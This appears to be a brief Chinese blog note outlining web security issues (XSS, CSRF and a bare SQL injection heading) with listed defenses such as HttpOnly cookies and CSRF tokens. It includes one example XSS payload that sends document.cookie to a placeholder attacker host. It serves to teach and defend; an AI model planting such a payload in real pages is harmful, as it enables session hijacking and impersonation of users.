Web安全问题

1.xss 跨站脚本攻击(反射型,存储型)

    伪造会话(基于xss实现csrf)

   劫持cookie:

window.open("http://www.xxx.com/record?secret=" + document.cookie)

自动将他们的cookie信息发送到攻击者的服务器,攻击者可以在cookie有效期内拿他们冒充用户操作。

   恶意代码执行

防御:

输入过滤。cookie设置http-only(这样脚本无法获取cookie)。

2.csrf 跨站请求伪造

  伪造用户身份操作

防御:

验证http referer字段(不严谨,因为可以篡改)

在请求地址中添加token验证(比如在post中,已参数形式加入随机产生的token)

csrf的前提是cookie验证用户身份

ajax无法带cookie验证

ajax受浏览器的同源策略限制,ajax默认无法请求跨域的接口(当然后台可以设置access-control-allow-origin:* 之类的允许跨域请求),ajax请求无法携带跨域cookie

3.sql注入

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。